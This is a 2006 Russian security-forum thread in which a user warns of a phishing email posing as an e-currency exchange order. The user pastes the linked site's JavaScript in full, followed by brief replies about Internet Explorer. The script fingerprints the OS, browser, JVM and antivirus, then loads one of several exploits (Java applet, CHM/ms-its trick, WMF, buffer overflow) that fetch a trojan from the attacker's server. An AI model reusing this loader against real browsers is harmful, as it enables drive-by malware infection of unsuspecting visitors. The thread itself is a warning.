информационная безопасность
без паники и всерьез
 подробно о проектеRambler's Top100
Портрет посетителяSpanning Tree Protocol: недокументированное применениеВсе любят мед
BugTraq.Ru
Русский BugTraq
 Анализ криптографических сетевых... 
 Модель надежности двухузлового... 
 Специальные марковские модели надежности... 
 Крупный взлом GoDaddy 
 Просроченный сертификат ломает... 
 Phrack #70/0x46 
главная обзор RSN блог библиотека закон бред форум dnet о проекте
bugtraq.ru / форум / miscellaneous
Имя Пароль
ФОРУМ
если вы видите этот текст, отключите в настройках форума использование JavaScript
регистрация





Легенда:
  новое сообщение
  закрытая нитка
  новое сообщение
  в закрытой нитке
  старое сообщение
  • Напоминаю, что масса вопросов по функционированию форума снимается после прочтения его описания.
  • Новичкам также крайне полезно ознакомиться с данным документом.
гг.. У всех бывает свой первый раз. Но необязательно рассказывать о нем на всех форумах 26.02.06 19:37  Число просмотров: 1858
Автор: Killer{R} <Dmitry> Статус: Elderman
<"чистая" ссылка>
<miscellaneous>
Осторожно!!! эксплойты от order@speedy-exchange.com 26.02.06 19:15  
Автор: Ara Статус: Незарегистрированный пользователь
<"чистая" ссылка>
Всем привет! К нам на почту пришло следующее сообщение от order@speedy-exchange.com <speedy-exchange27@yandex.ru>:

-----------------------------

Dear, xxx@xxx.ru
Thank you for your Cash2Ecurrency Order.
This message is to confirm the successful posting of your order with the following data:
 
ORDER SUMMARY:
Order Identification Number: 7837571
Ecurrency Ordered: E-Gold
Exact Amount You Will Receive: 850 USD worth of E-Gold
Our Service Fee: 68.00 USD ( 8% )
Exact Amount We Have To Receive: 918.00 USD
E-Gold Account that we will fund: 1126589
 
PAYMENT METHOD: You have selected to transfer money to us using Bank Transfer
 
PAYER INFORMATION:
Name: Stanislav Rudnik
City: Moscow | Zip code: 215502 
Country: Russia
Your contact email address: xxx@xxx.ru
 
You can view your order status here: www.speedy-exchange.com/orderstatus.html 
Changes to this order can be made here: www.speedy-exchange.com/orderchange.html 
 
================================================
Thank you for your appreciation and for using Speedy-Exchange.com.
www.speedy-exchange.com

---

-----------------------------


При заходе на www.speedy-exchange.com (якобы система обмена электронных валют) в зависимости от версии браузера загружается эксплойт. HTML-код следующий:

<BODY>
<DIV id=header><A 
title="Speedy Exchange : Independent Electronic Gold Currency Exchanger | Featured Ecurrencies: E-Gold, 1MDC, Pecunix, E-Metal, E-Currency    Featured Payment Methods: Bank transfer, Western Union, Credit Cards, ATM Debit Cards, Virtual Cards" 
href="http://www.speedy-exchange.com"><IMG height=69 
alt="Speedy Exchange : Independent Electronic Gold Currency Exchanger | Featured Ecurrencies: E-Gold, 1MDC, Pecunix, E-Metal, E-Currency    Featured Payment Methods: Bank transfer, Western Union, Credit Cards, ATM Debit Cards, Virtual Cards" 
src="img/speedyexchangelogo.gif" width=234 border=0></A> 
<P></P></DIV><!-- end header -->
<DIV id=wrap><!-- content -->
<DIV id=content>
<DIV id=navlist>
<DIV id=left>
<H1></H1>
<p>Please, wait while page is loading...</p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
</DIV>
<DIV id=right>
<DIV id=bottom>
<DIV id=logolist></DIV><BR class=clear></DIV><!-- end bottom row --><!-- footer -->
<DIV id=footer>
<P></P>
<P class=endnote><A class=endnote 
title="About Speedy Exchange : An Electronic Gold Currency Market Maker" 
href="http://www.speedy-exchange.com">Speedy-Exchange.com | 
Phone/Fax: +1-270-5740406 | Email: contact [at] speedy-exchange.com | © 
speedy-exchange.com 2003 - 2005</A> <BR>Speedy Exchange offers, and provides its 
products and services as an independent third party unrelated to E-Gold, 
OmniPay, Pecunix or any other company. All conditions, fees and charges are 
subject to change without further notice. Western Union, E-Gold, Pecunix are 
registered trademarks of their respective owners. </P></DIV><!-- end footer --><!-- end wrap --></DIV>

<IFRAME name="StatPage" width=5 height=5 style="display:none"></IFRAME>
<IFRAME name="PageContainer" width=5 height=5 style="display:none"></IFRAME>
<DIV id="ObjectContainer"></DIV>
<IE:clientCaps ID="oClientCaps" /> 
<script type="text/javascript" language="JavaScript">
   
 function GetVersion(CLSID)
   {
            if (oClientCaps.isComponentInstalled(CLSID,"ComponentID"))
               {return oClientCaps.getComponentVersion(CLSID,"ComponentID").split(",");}
            else
               {return Array(0,0,0,0);}
   }

 function Get_Win_Version(IE_vers)
   {
     if (IE_vers.indexOf('Windows 95') != -1) return "95"
     else if (IE_vers.indexOf('Windows NT 4') != -1) return "NT"
     else if (IE_vers.indexOf('Win 9x 4.9') != -1) return "ME"
     else if (IE_vers.indexOf('Windows 98') != -1) return "98"
     else if (IE_vers.indexOf('Windows NT 5.0') != -1) return "2K"
     else if (IE_vers.indexOf('Windows NT 5.1') != -1) return "XP"
     else if (IE_vers.indexOf('Windows NT 5.2') != -1) return "2K3"
   }
 
 function Run_BOF()
   {
    self.focus();
    for (i=1 ; i <=4 ; i++)
    { 
        document.writeln('<iframe width=1 height=1 border=0 frameborder=0 src="pluginst.htm"></iframe>');
    }
    document.writeln('<iframe width=1 height=1 border=0 frameborder=0 src="ie0601d.htm"></iframe>');
   }
 
 var CGI_Script="http://www.speedy-exchange.com/cgi-bin/ie0601.cgi";
 
 if (navigator.appName=="Microsoft Internet Explorer")
   {
      Click_Request=CGI_Script+"?click";
      var InetPath=document.location.href;
      j=InetPath.lastIndexOf('/');
      InetPath=InetPath.slice(0,j);
      
      var ExploitNumber=1; 
      var IEversion=navigator.appVersion;
      var IEplatform=navigator.platform;
      if (IEplatform.search("Win32") != -1)
      {
         var WinOS=Get_Win_Version(IEversion);
         FullVersion=clientInformation.appMinorVersion;
         PatchList=FullVersion.split(";");
         for (var i=0; i < PatchList.length; i++)
         {  
           ServicePack=PatchList[i];
           j=ServicePack.indexOf('SP');
           if (j != -1)
           {  
              ServicePack=ServicePack.substr(j);
              Click_Request=Click_Request+'&'+ServicePack; 
           }
         }
         StatPage.location=Click_Request;
         var JVM_vers  = GetVersion("{08B0E5C0-4FCB-11CF-AAA5-00401C608500}"); 
         var IE_vers   = GetVersion("{89820200-ECBD-11CF-8B85-00AA005B4383}");
         fNortonAV=0; fMcAfee=0; XP_SP2_patched=0;
         try
         {
           var oNortonAV=new ActiveXObject("NAVCfgWizDll.NAVCfgWizMgr"); //Norton Antivirus Config Wizard initialization
           fNortonAV=1;
         }
         catch(e){} 
         try
         {
           var oMcAfee=new ActiveXObject("McGDMgr.DwnldGroupMgr"); // McAfee Security Download Control initialization 
           fMcAfee=1;
         }
         catch(e){}

         switch (WinOS)
         {
             case "2K":
                       if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))
                       {  ExploitNumber=1;  }    
                       else                                // if JVM = 5.0.3810.0 or higher
                       {
                          if ((fNortonAV==0)&&(fMcAfee==0))
                          { ExploitNumber=3; } 
                          else
                          { ExploitNumber=2; }  
                       }
                       break;
             case "2K3":
                          if ((fNortonAV==0)&&(fMcAfee==0))
                          { ExploitNumber=3; } 
                          else
                          { ExploitNumber=4; }  
                       break;             
             case "XP":
                                                                
                            if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))
                            {  ExploitNumber=1;  }    
                            else                                // if JVM = 5.0.3810.0 or higher
                            {
                               for (var i=0; i < PatchList.length; i++)
                               {  
                                  if (PatchList[i]=="SP2")
                                  {  XP_SP2_patched=1; }
                                 
                               }
                               if (XP_SP2_patched==0)
                               {
                                  if ((fNortonAV==0)&&(fMcAfee==0))
                                  { ExploitNumber=3; } 
                                  else
                                  { ExploitNumber=4; } 
                               }
                               else
                               {
                                  if ((fNortonAV==0)&&(fMcAfee==0))
                                  { ExploitNumber=5; } 
                                  else
                                  { ExploitNumber=4; }   
                               }
                            }
                       break;          
             default:  
                       if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))
                       {  ExploitNumber=1;  }             
                       else
                       {  ExploitNumber=2;  }            // if JVM = 5.0.3810.0 or higher
                     
                       break;         
         }
         // launching exploit which number is depends on Windows and IE versions
        
         switch (ExploitNumber)
         {
             case  1:
                       Trojan_Path=CGI_Script+"?exploit=MS03-11";
                       ObjectContainer.innerHTML='<applet archive="'+InetPath+'/'+'ie0601a.jar" codebase="'+InetPath+'" code="TakePrivileges.class" width=1  height=1><param name="ModulePath" value="'+Trojan_Path+'"></applet>';
                       break;
             case  2:
                       CHM_base='//ie0601b.chm'+'::'+'/main.htm';  
                       Protocol=unescape("%6ds-i%74s:%6dh%74%6dl:");
Init_String=Protocol+'file://'+'C:\\MAIN.MHT!'+InetPath+CHM_base;
                       oMSITS=document.createElement("<OBJECT data='"+Init_String+"' type='text/x-scriptlet'></OBJECT>"); 
                       document.body.appendChild(oMSITS); 
                       document.title="Loaded !"; 
                       break;
             case  3:
window.open("ie0601c.htm","Info","left=2000,top=2000,screenX=2000,screenY=2000,width=50,height=50,scrollbars=1,menubar=0,titlebar=0,toolbar=0,status=0"); 
self.focus();
                       break; 
             case  4:
                       setTimeout('Run_BOF()',2000); 
                       break;
             case  5:
                       PageContainer.location="ie0601e.wmf";
                       break;  
             default:
                       break;                   
          }

      }
   }
   else
   {
       StatPage.location=CGI_Script+"?click";
   }
</script>
</BODY>

---
Вы всё ещё юзаете IE? Тогда мы идём к вам! 27.02.06 12:55  
Автор: mss <Сергей> Статус: Member
<"чистая" ссылка>
Уже в который раз задаю один и тот же вопрос: а чем плох IE? 27.02.06 19:37  
Автор: Heller <Heller> Статус: Elderman
<"чистая" ссылка>
Он хорош... Только его слишком много ;-) Сладкая парочка IE + OE, этот рассадник заразы никогда не вылечат... Порочный круг: супер-фичи — заплатки — новые суперфичи (новые версии), и снова заплатки (которые домохозяйки не качают), и по тому же кругу... 27.02.06 23:06  
Автор: HandleX <Александр М.> Статус: The Elderman
Отредактировано 27.02.06 23:10  Количество правок: 3
<"чистая" ссылка>
гг.. У всех бывает свой первый раз. Но необязательно рассказывать о нем на всех форумах 26.02.06 19:37  
Автор: Killer{R} <Dmitry> Статус: Elderman
<"чистая" ссылка>
:)) 26.02.06 22:30  
Автор: Ara Статус: Незарегистрированный пользователь
<"чистая" ссылка>
1






Rambler's Top100
Рейтинг@Mail.ru


  Copyright © 2001-2021 Dmitry Leonov   Page build time: 0 s   Design: Vadim Derkach